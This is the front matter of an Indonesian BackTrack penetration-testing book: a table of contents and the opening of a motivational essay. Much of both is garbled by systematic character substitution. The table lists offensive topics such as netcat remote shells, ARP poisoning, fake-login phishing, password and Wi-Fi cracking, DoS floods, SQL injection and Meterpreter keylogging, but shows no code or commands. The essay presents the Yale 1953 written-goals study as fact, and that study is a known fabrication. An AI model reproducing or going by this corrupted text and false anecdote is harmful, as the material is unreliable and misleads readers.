ASWB1

www.indonesianbacktrack.or.
id
KATA PENGANTAR ......................................................................
DAFTAR ISI ....................................................................................
AUTHOR COIT ...........................................................................
A!AKEN THE DRAGON !ITHIN ............................................
"A" I # INTRODUCTION OF "ACKTRACK
1. MENGENAL BACKTRACK DAN SEJARAHNYA ...........................
1.1. Sejarah Backtrack ....................................................................
$.%. Versi!ersi "a#$ te%ah &iri%is ....................................................
'. S(BS(B T))LS BACKTRACK .......................................................
'.1. *#+,r-ati,# Gatheri#$ ............................................................
'.'. V.%#era/i%it" Asses-e#t .........................................................
'.0. E12%,itati,# T,,%s ...................................................................
'.3. 4ri!i%a$e Esca%ati,# .................................................................
'.5. Mai#tai#i#$ Access ..................................................................
'.6. Re!erse E#$i#eeri#$ ...............................................................
'.7. R8*D T,,%s .............................................................................
'.9. Stress Testi#$ ..........................................................................
'.:. 8,re#sics .................................................................................
'.1;. Re2,rti#$ T,,%s ....................................................................
'.11. Ser!ices ................................................................................
'.1'. Misce%%a#e,.s .......................................................................
0. 4EMB(ATAN 8*LE *S) DAN *NSTALAS* BACKTRACK ................
0.1 D,<#%,a& is, +i%e /acktrack ....................................................
0.' Me-/.at is, /acktrack ............................................................
0.0 *#sta%asi /acktrack ste2 /" ste2 ................................................
3. DEV*CE DAN HARD=ARE TR)(BLE SH)(T*NG .........................
www.indonesianbacktrack.or.id
5. 4ERL>4YTH)N DAN BASH .................................................................
6. 4ENGG(NAAN (SB M)DEM ............................................................
6.1. <!&ia% .......................................................................................
6.'. G#,-e222 ? K222 .................................................................
6.0. 444
7. MANAJEMEN L)G ................................................................................
&.$ Me%ihat %,$ terakhir &ari akti!itas .ser ...........................................
&.% Akses %,$ /e/era2a ser!ice @ A!arA%,$ B .....................................
9. M(LT*MED*A ? M*SC ...........................................................................
:. (4DATE ? (4GRADE ...........................................................................
"A" II # 'EARN NET!ORKING ON "ACKTRACK
1. L)CAL AREA NET=)RK ..................................................................
1.1 Basic C,--a#& ........................................................................
'. =*RELESS C)N8*G(RAT*)N ? C)MMAND L*NE .......................
'.1. SS*D sca##i#$ s.2,rt ...............................................................
'.'. M,&e Ma#a$e-e#t ...................................................................
'.0. Da+tar 2eri#tah %ai##"a .............................................................
0. 444)E .....................................................................................................
3. NETCAT THE S=*SS ARMY KN*8E ...................................................
3.1. Me#$$.#aka# Netcat ...............................................................
3.'. Re-,te she%% access ................................................................
"A" III # KNO!ING SER(ICE ON "ACKTRACK
1. SSHD DAEM)N SERV*CE .................................................................
1.1. 4e#$,2erasia# ssh ser!ice ......................................................
1.'. SSH Ser!er ............................................................................
1.0. S8T4 &a# SC4 ........................................................................
'. HTT4D DAEM)N SERV*CE ..............................................................
'.1. 4e#$,2erasia# HTT4D ser!ice ...............................................
'.'. K,#+i$.rasi HTT4D ser!ice ...................................................
0. G4SD DAEM)N SERV*CE .................................................................
0.1. 4e#$,2erasia# G4SD ser!ice ..................................................
0.'. K,#+i$.rasi G4SD ser!ice ......................................................
3. SN)RT DAEM)N SERV*CE .................................................................
3.1. 4e#$,2erasia# S#,rt ser!ice .....................................................
3.'. K,#+i$.rasi S#,rt ser!ice .........................................................
"A" I( # INFORATION GATHERING
1. THE EYE )8 NMA4 ..............................................................................
1.1. 4e#$ertia# NMA4 ....................................................................
1.'. 4eri#tah2eri#tah &asar .............................................................
1.0. )2si 2a&a 2,rt sca##i#$ .................................................................
1.3. 4eri#tah %ai##"a .........................................................................
1.5. )2si ,.t2.t ................................................................................
1.6. 4eri#tah2eri#tah a&!a#ce .........................................................
'. H4*NG ......................................................................................................
'.1. Ke$.#aa# H4*NG .....................................................................
0. (N*C)RN Sca##er ...................................................................................
0.1. 4e#$e#a%a# (#ic,r# ...................................................................
0.1. 4eri#tah Dasar ...........................................................................
0.1. 4eri#tah Lai##"a .......................................................................
). AR4*NG ....................................................................................................
3.1. 4e#$e#a%a# Ar2i#$ .....................................................................
3.'. 4eri#tah Ar2i#$ .........................................................................
*. =HAT=EB ...............................................................................................
5.1. 4e#$e#a%a# =hat=e/ ................................................................
5.'. 4eri#tah =hat=e/ .....................................................................
6. DNSEN(M ..............................................................................................
6.1. 4e#$e#a%a# DNSE#.- .............................................................
6.'. 4eri#tah DNSE#.- ..................................................................
7. 4R)CYCHA*N ........................................................................................
7.1. 4e#$e#a%a# 4r,1"chai# ............................................................
7.'. K,#+i$.rasi 2r,1"chai#s ..........................................................
7.0. Met,&e 2r,ses 2r,1"chai#s ......................................................
&.). 4eri#tah &a# 2e#$$.#aa# ........................................................
"A" ( + IT ATTACK
1. M*TM ATTACK ......................................................................................
1.1. 4r,ses terja&i#"a sera#$a# M*TM ............................................
1.'. AR4 4,is,#i#$ .........................................................................
1.0. K,#se2 Sera#$a# ......................................................................
'. M*TM =*TH ETTERCA4 ......................................................................
'.1. Met,&e sera#$a# AR4 2,is,#i#$ &a# S#i++i#$ attack ...............
'.1.1. Met,&e sera#$a# etteca2 ........................................................
'.1.1.1. Met,&e sera#$a# secara -e#"e%.r.h ..................................
'.1.1.'. Met,&e sera#$a# terha&a2 sat. s2esi+ik *4 .........................
'.'. S2,++i#$ 4%.$i# .........................................................................
0. 4H*SS*NG ATTACK @ 8AKE L)G*N B ...................................................
0.1. 4e#$ertia# 4hissi#$ ..................................................................
0.'. Met,&eMet,&e Sera#$a# 4hissi#$ ..........................................
0.0. Me-/.at Ha%a-a# %,$i# 2a%s. @ +ake%,$i# B ............................
3. SESS*)N H*JACK*NG ...........................................................................
3.1. 4e#$ertia# sessi,# hijacki#$ ....................................................
3.'. *-2%e-e#tasi sessi,# hijacki#$ ................................................
"A" (I # GET ACCESS , PASS!ORD
1. S)C*AL ENG*NEER*NG .......................................................................
1.1. 4e#$ertia# S,cia% E#$i#eeri#$ ..................................................
1.'. 4e#era2a# S,cia% E#$i#eeri#$ ...................................................
1.'.1. 4e#$.-2.%a# i#+,r-asi @ i#+,r-ati,# $atheri#$ B .................
1.'.'. G,,$%e hacki#$ ......................................................................
1.'.0. Meta$,,+i% ..............................................................................
1.'.0.1. Direct,r" -eta$,,+i% ...........................................................
1.'.0.'. Me-.%ai @ esek.si B -eta$,,+i% ...........................................
1.'.0.0. D.er" stri#$ -eta$,,+i% .......................................................
1.'.3.H,#e"& ....................................................................................
1.'.5. S.E.T ......................................................................................
'. )88L*NE 4ASS=)RD ATTACK ..........................................................
'.1 C.22.2"...........................................................................................
'.1.1. Me-/.at 2ass<,r& %ist &e#$a# C.22.2" ................................
'.1.'. %,kasi c.22.2" .........................................................................
'.1.0. 4e#$$.#aa# c.22.2" ..............................................................
'.'. J,h# The Ri22er ........................................................................
'.'.1. 4e#$ertia# Jh,# The Ri22er ...................................................
'.'.'. 4e#$,2erasia# Jh,# The Ri22er .............................................
'.0. C,<2att" ...................................................................................
'.0.1..4e#$ertia# C,<2att" ..............................................................
'.0.'. 4e#$$.#aa# C,<2att" ............................................................
0. )NL*NE 4ASS=)RD ATTACK ............................................................
0.1 H"&ra .........................................................................................
0.1.1. 4e#$ertia# H"&ra ...................................................................
0.1.'. 4e#$$.#aa# H"&ra .................................................................
0.'. Me&.sa ......................................................................................
0.'.1. 4e#$ertia# Me&.sa .................................................................
0.'.'. 4e#$$.#aa# H"&ra .................................................................
"A" (II # !IFIFU
1. A*RCRACKNG ......................................................................................
1.1. 4e#$ertia# Aircrack ..................................................................
1.'. Air-,#NG ..............................................................................
1.'.1. 4e#$$.#aa# air-,##$ ..........................................................
1.0. *<c,#+i$ C,--a#& ..................................................................
'. A*R)D(M4NG .....................................................................................
0. A*RE4LAYNG .......................................................................................
0.1. 4e#$$.#aa# aire2%a"#$ ...........................................................
0.'. *#jecti,# Testi#$ .......................................................................
0.0. Dea.the#ticati,# .......................................................................
0.0.1. +akea.th &e%a" ............................................................................
3. MACHANGGER .....................................................................................
3.1. 4e#$ertia# Maccha#$$er ..........................................................
3.'. 4e#era2a# Mac A&&ress 4a&a Backtrack .................................
3.0. 4eri#tah E 2eri#tah &asar 2a&a c,#s,%e ....................................
5. LAB TASK ..............................................................................................
5.1. =E4 4e#etrati,# .......................................................................
5.1.1. 4r,ses Share& Ke" A.the#ticati,# ........................................
5.1.'. 4e#test =E4 &e#$a# c%ie#t .....................................................
5.1.0. 4e#test =E4 ta#2a c%ie#t ........................................................
5.'. =4AA=4A' 4e#etrati,# ............................................................
5.'.1. =4A Ha#&shake......................................................................
5.'.'. *-2%e-e#tasi Aircrack#$ .....................................................
5.'.0. *-2%e-e#tasi C,<2att" .........................................................
"A" (III # STRESS TESTING
1. STRESS TEST*NG ...................................................................................
1.1. D,S Attack .................................................................................
1.'. DD,S Attack ...............................................................................
1.0. SYN +%,,&i#$ attack ...................................................................
1.3. TC4 c,##ecti,# +%,,& .................................................................
1.5. (D4 +%,,& ...................................................................................
1.6. *cM4 +%,,&i#$ attack ..............................................................
'. LAB TASK ................................................................................................
'.1. SYN +%,,& testi#$ .......................................................................
'.'. TC4 C,##ecti,# +%,,& testi#$ ....................................................
'.0. (D4 +%,,& testi#$ .......................................................................
'.0.1. (D4.4L ....................................................................................
'.3. *CM4 +%,,& testi#$ .....................................................................
0. T))LS LA*NNYA ....................................................................................
0.1 Let&,<# ......................................................................................

"A" I- # !E" ATTACK PENETRATION
1. =EB ATTACK =*TH BACKTRACK
1.1. Je#isje#is !.%#era/i%it" .............................................................
1.1.1. SDLi#jecti,# ..........................................................................
1.1.'. CSS ........................................................................................
1.1.0. L8* ........................................................................................
1.1.3. R8* ........................................................................................
'. LAB TASK ..............................................................................................
'.1. *-2%e-e#tasi SDL *#jecti,# .....................................................
'.1.'. SDL *#jecti,# L,$i# 8,r- ....................................................
'.1.0. SDL i#jecti,# (RL @ SDL-a2 B ............................................
'.'. *-2%e-e#tasi CSSTesti#$ /.$ .................................................
'.'.1. Bee+ <e/ +ra-e<,rk .............................................................
'.'.'. Csser ......................................................................................
0. =EB SCANNER ......................................................................................
0.1. Nikt, .........................................................................................
0.'. Ness.s .......................................................................................
0.0. J,,-sca# ..................................................................................
3. EC4L)*T DATABASE ...........................................................................
3.1. &/e12%,it .................................................................................

"A" - # ETASP'OIT
1. 4ENGENALAN .......................................................................................
1.1. Sejarah &a# t,k,h &i/a%ik %a"ar ................................................
1.'. Da+tar seri &a# !ersi -etas2%,it ................................................
1.0. Metas2%,it 2a&a /acktrack %i#.1 ...............................................
1.3. 8i%e siste- &a# %i/rar" ...............................................................
1.5. -s+.2&ate .................................................................................
'. METAS4L)*T 8(NDAMENTAL ..........................................................
'.1. Ms+c%i ........................................................................................
'.1.1. Ms+c%i he%2 c,--a#& ............................................................
'.1.'. Me-eriksa ke/.t.ha# i#+,r-asi ...........................................
'.1.0. K,-2eti/e% 2a"%,a& ...............................................................
'.1.0. C,#t,h sera#$a# &a# 2e#$$.#aa# ..........................................
'.'. Ms+c,#s,%e ................................................................................
'.'.1. Ms+c,#s,%e c-& c,--a#& ....................................................
'.'.'. 4eri#tah -a#aje-e# e12%,it ...................................................
'.0. 4a"%,a& ......................................................................................
'.0.1. Ti2e 2a"%,a& ...........................................................................
'.0.'. Me-/.at 2a"%,a& ...................................................................
0. *N8)RMAT*)N GATHER*NG ..............................................................
0.1. D/Fc,##ect ...............................................................................
0.'. D/F#-a2 ...................................................................................
3 . MA*NTA*N*NG ACCESS ......................................................................
3.1. re!erseFtc2 ..............................................................................
3.'. she%%F/i#&Ftc2 .........................................................................
3.0. Meter2reter Ke"%,$$er ............................................................
3.3. Me#a-/ah .ser 2a&a siste- <i#&,<s .....................................
5. METER4RETER ....................................................................................
5.1. Me#$e#a% &a# -e-i%ih sessi,# .................................................
5.'. Me%ihat 2r,ses /erja%a# .............................................................
5.0. Me%ihat isi &irekt,ri ...................................................................
5.3. Mi$rate ke 2r,ses terte#t. ........................................................
5.5. D,<#%,a& &a# .2%,a& ke &irekt,ri -esi# tar$et ......................
5.6. Me%ihat i#+,r-asi #et<,rk tar$et ..............................................
5.7. Me%ihat .ser i& @ $et.i& B ...........................................................
5.9. Me#$esek.si 2r,$ra-A+i%e terte#t. ............................................
5.:. Me-/.ka she%% ...........................................................................
5.1;. .Hash&.-2 ...............................................................................
5.11. 4ri!i%a$e esca%ati,# ..................................................................
5.1'. Me#$ha2.s %,$ .........................................................................
5.10. Scree#ca2t.re ...........................................................................
5.13. VNC re-,te &eskt,2 ................................................................
6. METAS4L)*T BR)=SER A(T)4=N ................................................
..$. C,#t,h sera#$a# .......................................................................

4EN(T(4 .....................................................................................................
B*)GRA8* 4EN(L*S ..................................................................................
Gic, 8err" Eke% ...........................................................................
Ja-es;/aster ...............................................................................
Ha/i/i RiHk" Rah-a&a# .............................................................

Awaken the Dragon within
MOTIVATION
by. Habibi Rizqi Ramadhan
Ba#"ak seka%i ,ra#$ "a#$ i#$i# /e%ajar /acktrack teta2i -ereka ti&ak -e#$a-/i%
ti#&aka# .#t.k -e-.%ai#"a. A#&a a&a%ah ,ra#$ "a#$ %.ar /iasa kare#a -e#$a-/i%
ke2.t.sa# .#t.k /e%ajar Backtrack &e#$a# cara -e-/e%i /.k. i#i. Bera<a% &ari
ti#&aka# keci% @-e-/e%i /.k. /acktrackB> -e-/aca rahasiarahasia &ahs"at "a#$
tersi-2a# &i &a%a- /.k. i#i hi#$$a 2raktek sat. 2er sat. -aka 2er%aha# ta2i 2asti
A#&a aka# -e#ja&i se,ra#$ IMasterJ. Se&erha#a /.ka#K Ta2i /e/era2a ,ra#$ a&a
"a#$ -e#$a%a-i kes.%ita# &a%a- -e-2e%ajari /acktrack. Me#$a2a /isa terja&iK
Kare#a LNa$aM "a#$ a&a &i &a%a- &iri -ereka terti&.r &e#$a# 2.%as &a# har.s kita
/a#$.#ka#. Ba$ai-a#a cara -e-/a#$.#ka# #a$a &i &a%a- &iri kitaK
$.Goa/
Ketika A#&a /erja%a#ja%a# &i t,k, /.k.. Ti/ati/a &a%a- &iri A#&a -e#$ataka#
NBe%ajar /acktrack> ".kON. A#&a /erta#"a ke2a&a kar"a<a# &i t,k, /.k. &a#
%a#$s.#$ &ia#tarka# ke rak /.k. k,-2.ter "a#$ ter&a2at /.k. /acktrack. Me#$a2a
kar"a<a# t,k, /.k. &a2at -e#$a#tar ses.ai kei#$i#a# A#&aK Kare#a A#&a
-e-i%iki t.j.a#. Sete%ah a#&a -e-i%ih /.k. i#i &a# -e-/e%i. A2a t.j.a# A#&aK
A2akah ha#"a i#$i# tah. ata. i#$i# Ises.at.JK Mari kita /ahas %e/ih &a%a-.
Me#$a2a A#&a har.s -e-i%iki t.j.a# &a# a2a saja s"arat#"a sehi#$$a :5P A#&a
2asti /erhasi%K
a.0e/as
Sa%ah sat. tek#,%,$i ter&ahs"at &a# +e#,-e#a% &i *#ter#et a&a%ah G,,$%e. G,,$%e
a&a%ah -esi# 2e#$etah.a# "a#$ &a2at -e-/erika# se$a%a i#+,r-asi &a#
2e#$etah.a# &e#$a# -et,&e search e#$i#e. Ketika A#&a i#$i# /e%ajar cara i#sta%%
Backtrack %a%. a2a "a#$ A#&a ketik &i $,,$%eK S.&ah 2asti> Icara i#sta%% /acktrackJ.
Jika A#&a ha#"a -e#$etik /acktrack. A2a "a#$ aka# &ita-2i%ka# ,%eh G,,$%eK
Se-.a i#+,r-asi -e#$e#ai /acktrack> /.ka#K *#i a&a%ah tek#,%,$i "a#$ &ahs"at &a#
&i-i%iki ,%eh ,tak kita j.$a. Ti&ak ha#"a G,,$%e saja> ,tak "a#$ a&a &i &a%a- ke2a%a
A#&a j.$a se2erti it.. Sa"a i#$i# -e-/.ktika##"a &e#$a# 2e#$a%a-a# "a#$
-.#$ki# kita se-.a 2er#ah -e#$a%a-i. Ketika A#&a /erja#ji &e#$a# reka# kerja
A#&a .#t.k i#sta%asi <ar#et !ia ha#&2h,#e. A#&a -e#$ataka#> NNa#ti s,re &i
=ar#et 4ri-a>N. A#&a s.&ah &ata#$ te2at ja- 3 s,re. A#&a -e#.#$$. &e#$a# kesa%
/ahka# te-a# A#&a s.sah .#t.k &ih./.#$i. 1 ja- ke-.&ia#> te-a# A#&a &ata#$
&e#$a# <ajah "a#$ /aha$ia &a# 2e#.h se-a#$at. Sia2akah "a#$ /ersa%ahK Ya#$
sa%ah a&a%ah 2erja#jia# A#&a kare#a ti&ak je%as. Te-a# A#&a ti&ak sa%ah kare#a ja-
5 ter-as.k s,re. A#&a -e-/e%i /.k. i#i> a2a t.j.a# A#&aK A#&a i#$i# -ahir
-e#$$.#aka# /acktrackK Me#$$.#aka# a2aK Bisa *#sta%% Backtrack saja ata. A#&a
i#$i# -e#$.asai -etas2,%itK
Semakin jelas impian Anda, semakin mudah Anda berhasil mencapai
impian Anda
b. enin1katkan 2awa na3s4
S.at. hari ketika A#&a -erasa sa#$at %e%ah> i#$i# -ere/ahka# /a&a# ke kas.r &a#
&ite-a#i h.ja# /a&ai "a#$ -e-/a#t. A#&a .#t.k terti&.r 2.%as. Ti/ati/a A#&a
ka$et kare#a ha#&2h,#e A#&a /er/.#"i. Te-a# A#&a -e-i#ta t,%,#$ .#t.k &ata#$
ke r.-ah "a#$ /er%,kasi ' ja- &ari r.-ah A#&a &a# -e-/a#t. -e-2er/aiki
k,-2.ter#"a. *#i a&a%ah k,#&isi "a#$ 2erta-a. Ba#&i#$ka# &e#$a# k,#&isi ke&.a>
A#&a -e#$a%a-i k,#&isi "a#$ sa-a "ait. ca2ek &a# h.ja# /a&ai teta2i te-a# a#&a
-e#$ataka# .#t.k -e#a<arka# 2ekerjaa# i#sta%asi <ar#et &e#$a# /a"ara# "a#$
sa#$at -e#$$i.rka#. Ma#akah "a#$ A#&a 2i%ihK Sa"a "aki# kita se-.a -e-i%ih
#,-,r &.a. Seri#$ka%i ,ra#$ ti&ak -e#ca2ai t.j.a##"a kare#a ti&ak -e-/.at &ia
#a+s. sehi#$$a &ia -ere-ehka# &a# -a%as .#t.k -e#ca2ai. A2akah t.j.a# A#&a
-e#&a%a-i Backtrack -e-/.at &iri a#&a -e#ja&i se-a#$at 35K
Mereka yang gagal, bukan karena impian terlalu besar tetapi menganggap remeh
impian yang kecil
c. "4at/a2 i56ian 7an1 tidak 5as4k aka/8teta6i Rencana 2ar4s 5as4k aka/

Ga-a# sekara#$ a&a%ah Ha-a# "a#$ ser/a -e#$$.#aka# tek#,%,$i.
Sekara#$ kita &a2at /erk,-.#ikasi &e#$a# ,ra#$ &i /e#.a "a#$ /er/e&a &a# &a2at
-e-/a%as ha#"a &a%a- hit.#$a# &etik> -e#&e#$arka# s.ara &a# -e%ihat -ereka
secara %a#$s.#$. Jika kita ter%ahir &i Ha-a# &.%.> -isa%#"a 1;; tah.# "a#$ %a%..
A2akah tek#,%,$i i#i &a2at &iteri-a ,%eh ,tak A#&aK M.#$ki# a&a "a#$ /er2ikir
/ah<a i#i sa#$at -.stahi%. Teta2i &i Ha-a# sekara#$> tek#,%,$i i#i s.&ah -e#ja&i
ha% "a#$ /iasa &a# .#t.k ,ra#$ "a#$ ti&ak /isa -e#$$.#aka# &ise/.t ,ra#$ Ija&.%J.
Me#$a2a ha% "a#$ -.stahi% &a2at -e#ja&i ha% /iasaK Kare#a re#ca#a -ereka -as.k
aka%. S.&ahkah a#&a -ere#ca#aka# i-2ia# A#&aK
Selama hukum Tuhan, kitab suci, hukum alam mengatakan bisa, anda pasti bisa
meraih impian
d. Catat
Ketika kita &.&.k &i /a#$k. TK. G.r.$.r. seri#$ /erta#"a ke2a&a kita. A2a t.j.a#
kitaK A&a "a#$ -e#$ataka# &,kter> 2i%,t> 2,%isi> $.r.. A#eh#"a kita se-.a ti&ak a&a
"a#$ -e#ja<a/ i#$i# -e#ja&i Isec.rit" A#a%"stJ> /.ka#K Da# sekara#$ A#&a
/ercitacita -e#ja&i sec.rit" a#a%"st. Ke-a#a citacita kita "a#$ &ah.%.K Me#$a2a
/isa ter%.2aka#K Kare#a kita ha#"a -e#$ataka#> ti&ak a&a catata# &a%a- /e#t.k
+isik &a# ter2e#$ar.h &e#$a# %i#$k.#$a# sehi#$$a t.j.a# /er./ah./ah.
Ba#&i#$ka# jika A#&a -e#.%is t.j.a# &ari -e-/aca /.k. i#i ata. -e%ak.ka# ha%
"a#$ %ai# -aka A#&a aka# se%a%. i#$at &e#$a# t.j.a# A#&a. Ha% "a#$ 2a%i#$ i#$i#
sa"a teka#ka# a&a%ah i-2ia# "a#$ a#&a -i%ki har.s &i &a%a- ke#&a%i A#&a "a#$
arti#"a i-2ia# .#t.k &iri se#&iri. Sa"a seri#$ -e%ihat ,ra#$ t.a -e-i%iki i-2ia#
.#t.k -asa &e2a# a#aka#ak -ereka. Se/a$ai ,ra#$ t.a> ha#"a -e-/erika# araha#
"a#$ ter/aik .#t.k a#aka#ak -erta serta -e-+asi%itasi a2a "a#$ &i/.t.hka# /aik it.
&.k.#$a# kasih sa"a#$ &a# I-ateriJ. Ya#$ -e-.t.ska# .#t.k -asa &e2a# teta2
a#aka#ak -ereka. Seri#$ka%i ,ra#$ %.2a &e#$a# re#ca#a#"a kare#a ti&ak -e#.%is
catata#> /.ka#K De#$a# A#&a -e#.%is $,a%> A#&a %e/ih -.&ah .#t.k -e%ak.ka#
i#tr,2eksi. A2akah $,a% A#&a s.&ah terca2ai ata. /e%.-K
Tah.# 1:53> Ya%e (#i!ersit" -e%ak.ka# 2e#e%itia# terha&a2 se-.a %.%.sa#
&i tah.# terse/.t. Mereka -e#&ata sia2a saja "a#$ te%ah -e#catat. Ha#"a 0 P
%.%.sa# "a#$ -e-i%iki catata# i-2ia#. '; tah.# ke-.&ia#> &i%ak.ka# 2e#e%itia#
.%a#$ &a# terja&i ha% "a#$ sa#$at -e#akj./ka#. 4er/a#&i#$a# keka"a# a#tara
a%.-#i Ya%e (#i!ersit" "a#$ -e-i%iki catata# i-2ia# @0PB &e#$a# a%.-#i Ya%e
(#i!ersit" "a#$ ti&ak -e-i%iki catara# i-2ia# @:7PB a&a%ah 0 Q 1
Mari kita /ersa-asa-a .#t.k 2raktik &a# se/.tka# sa%ah sat. $,a% "a#$ 2a%i#$
-e-,ti!asi A#&a -e-/e%i /.k. i#iQ
A2a t.j.a# A#&aK ..........................................................................
Ka2a#K
.......... @hariB> . @ta#$$a%B> .......... @/.%a#B> .....@tah.#B
Di-a#aK ........................................................................................
Tulis & tentukan impian Anda atau dunia yang menentukan impian Anda
%.Ke7akinan
4a&a s.at. ketika ter&a2at se,ra#$ 2e-.&a "a#$ se&a#$ -e#cari s.at. /ara#$ "a#$
ter&a2at 2a&a $.&a#$ atas 2eri#tah atasa##"a. *a sa#$at tak.t kare#a te-2at .#t.k
-e#cari /ara#$ "a#$ &i-aks.& sa#$at -e#"era-ka# /a$i#"a. Di &a%a- 2ikira##"a
ia s.&ah -e-/a"a#$ka# ha%ha% a#eh a2a "a#$ &a2at -e#ce%akai#"a.
Rasa tak.t terse/.t se-aki# -e#ja&ija&i ketika ia -asih /e%.- -e#e-.ka# /ara#$
"a#$ &i-aks.& &a# &i2aksa .#t.k -e#cari %e/ih ja.h %a$i> sehi#$$a -as.k%ah ia ke
&a%a- s.at. r.a#$a# 2e#&i#$i#> kare#a ti&ak a&a te-2at %ai# -aka ia ter2aksa
-as.k ke &a%a- &a# -e#$etah.i /ah<a it. a&a%ah r.a#$a# te-2at -e#"i-2as es
"a#$ sa#$at &i#$i#.
Ma%a#$ #asi/ 2e-.&a terse/.t> 2i#t. "a#$ -e#.t.2 r.a#$a# terse/.t secara ti&ak
se#$aja tert.t.2 &a# terk.#ci> sehi#$$a ti&ak /isa &i/.ka &ari &a%a-. *a sa#$at 2a#ik
&a# teriak -i#ta t,%,#$ IT)L)))))NG> T)L)))))NG> T)L))))NG>
SAYA TERJEBAK D* R(ANGAN 4END*NG*N> SAYA B*SA MAT*
KED*NG*NANOJ . Dia 2.# -.%ai -erasaka# ha<a &i#$i# "a#$ -e#.s.k /a&a##"a>
&ia /er2ikir /ah<a r.a#$a# it. sa#$at%ah &i#$i# kare#a &i &e2a# r.a#$a# se/e%.- ia
-as.k ter&a2at t.%isa# I4LEASE STAY A=AY *8 Y)( D)NMT BR*NG A
=ARMER JACKET> ECTREME C)LD AB)(T '7 BEL)= GER)J i#i sa#$at
-e#$ha#t.i#"a &a# -e-/.at#"a se-aki# $i%a ke&i#$i#a#> kare#a &ia /er2ikir ti&ak
-.#$ki# /isa -a#.sia /ertaha# &i s.h. i#i akhir#"a &ia -ati ke&i#$i#a#.
4e#asara# aki/at a#ak /.ah#"a ti&ak kia# -.#c.%> akhir#"a atasa##"a 2.# t.r.# &a#
-e#$ecek a2akah se-.a#"a /erja%a# &e#$a# /aik ata. ti&ak. Sete%ah %a-a -e#cari
akhir#"a sa-2ai%ah atasa##"a ke2a&a r.a#$a# 2e#&i#$i# "a#$ terk.#ci terse/.t &a#
-e#e-.ka# a#ak /.ah#"a s.&ah ter/.j.r kak. &i &a%a-. Ta#2a /er2ikir 2a#ja#$>
4i-2i#a##"a 2.# %a#$s.#$ -e-/a<a#"a ke r.-ah sakit &a# sete%ah hasi% cek
!is.- &a# &i,t,2si 2e#"e/a/ ke-atia# 2e-.&a i#i a&a%ah aki/at ke&i#$i#a#.
Sete%ah &i cek r.a#$a# te-2at ia -ati ter#"ata r.a#$a# es terse/.t r.sak &a# ti&ak
/er+.#$si sejak %a-a> /ahka# s.h. 2a&a r.a#$a# terse/.t sa#$at #,r-a%. La%. a2a
"a#$ -e#"e/a/ka# 2e-.&a terse/.t -ati K 4*K*RANNYA.
Kisah #"ata &i atas -e-/.ktika# /ah<a /eta2a /er2e#$ar.h#"a se/.ah 2ikira# 2a&a
&iri sese,ra#$ /ahka# sa#$at /er2e#$ar.h 2a&a hi&.2 -ati#"a sese,ra#$. Bahka#
a&a cerita &ari se,ra#$ 2e#ja$a a-/.%a#s "a#$ s.&ah /ert.$as se%a-a 0; tah.#
-e%ihat ,ra#$,ra#$ "a#$ -ati &i a-/.%a# aki/at 2e#"akit ata. kece%akaa#> &ia
-e#$ataka# ,ra#$,ra#$ "a#$ /erhasi% /ertaha# sa-2ai ke r.-ah sakit a&a%ah ,ra#$
"a#$ -asih> ter.s &a# teta2 -e-/.ka -ata#"a sa-2ai r.-ah sakit. )ra#$,ra#$
"a#$ /er2ikir /ah<a -ereka -asih /isa hi&.2> ti&ak 2e&.%i s.&ah seha#c.r a2a
t./.h -ereka.
Anda adalah apa yang Anda pikirkan!

Cerita &i atas -e-/.ktika# /ah<a ke"aki#a# &i &a%a- &iri &a2at -e-2e#$ar.hi
kesehata# hi#$$a -e#"e/a/ka# ke-atia#. Sa"a i#$i# -e#ceritaka# 2e#$a%a-a#
2ri/a&i saat terke#a 2e#"akit "a#$ -e#"era#$ /a$ia# 2er#a+asa# "ait. Si#.sitis.
Se$era%ah -e#.j. ke r.-ah sakit .#t.k -e#$hi%a#$ka# 2e#"akit i#i. D,kter
-e-/erika# ,/at &a# -e-2eri#$atka# /ah<a sa"a ti&ak /,%eh /ere#a#$ &a#
keh.ja#a#> jika sa"a -e%a#$$ar#"a -aka sa"a -e#$a%a-i 2e#.r.#a# &a"a taha#
t./.h> 2.si#$> &a# +%.. Sa"a &ata#$ ke r.-ah sakit kare#a 2erca"a /ah<a i#i a&a%ah
te-2at .#t.k se-/.h. Sa"a s.ka -e%a#$$ar 2erkataa# &,kter &a# a2a "a#$
&ikataka# &,kter /e#ar /e#ar ke#"ataa#. Sete%ah sa"a -e#$etah.i ke&ahs"ata#
2ikira#> Sa"a %a#$s.#$ -e-2raktikka#. S.at. hari h.ja# &eras -e#$$.".r ketika
sa"a i#$i# -e%ak.ka# 2erja%a#a#. Sa"a "a#$ stat.s#"a -asih ke%as 0 SMA &a# har.s
-e#e-2.h 2erja%a#a# "a#$ c.k.2 ja.h. Sa"a -e#$ataka# ke2a&a &iri se#&iri>
NA%ha-&.%i%%ah> h.ja# a&a%ah reHeki. H.ja# -e-/.at &iri sa"a se-aki# sehat>
se-aki# k.at> se-aki# se-a#$at .#t.k s.ksesN. Sesa-2ai &i te-2at t.j.a#> sa"a
/i#$.#$ &a# -e#cari ses.at.. Ke-a#akah %e-as> +%.> 2.si#$K Mereka hi%a#$> j.str.
"a#$ &ata#$ ke2a&a &iri sa"a a&a%ah kesehata#> kek.ata# &a# se-a#$at. *#i &a2at
terja&i jika kita &a2at -er./ah N/e%ie!e s"ste-N. Kesehata# saja &a2at
-e-2e#$ar.hi> /a$ai-a#a &e#$a# /e%ajar /acktrackK Te#t. sa#$at /er2e#$ar.h
seka%i. A&akah &i a#tara te-a#te-a# "a#$ -e#$ataka# /ah<a -ate-atika a&a%ah
N2e%ajara# "a#$ s.%itN. Jika A#&a -e#$ataka# -ate-atika a&a%ah 2e%ajara# "a#$
s.%it> ke-.#$ki#a# /esar #i%ai A#&a ti&ak /a$.s> /.ka#K Be%ie!e S"ste- &a2at
ter/e#t.kQ
1. Me#$a-/i% kesi-2.%a# saat ata. sete%ah /erti#&akR
Hasi% "a#$ a#&a &a2atka# -e-2e#$ar.hi ke"aki#a#. A2a2.# hasi% &ari ti#&aka#.
Bersi+at #etra%> kita "a#$ -e#$artika# -e#ja&i 2,siti+ ata. #e$ati+. Jika -e#$a%a-i
ke$a$a%a# &a%a- -e#c,/a i%-. &i /.k. i#i> a&a "a#$ -e#$artika# .#t.k
-e#i#$katka# /e%ajar ata. ti&ak /er/akat Backtrack.
'.4e#$a%a-a# ,ra#$ %ai#R
i#i seri#$ terja&i /a$i ,ra#$ ,ra#$ "a#$ /e%.- 2er#ah 2raktek teta2i s.&ah -e-i%iki
N/e%ie!e s"ste-N. Ha% "a#$ ter+ata% a&a%ah ,ra#$ %ai# terse/.t a&a%ah ,ra#$ he/at &i
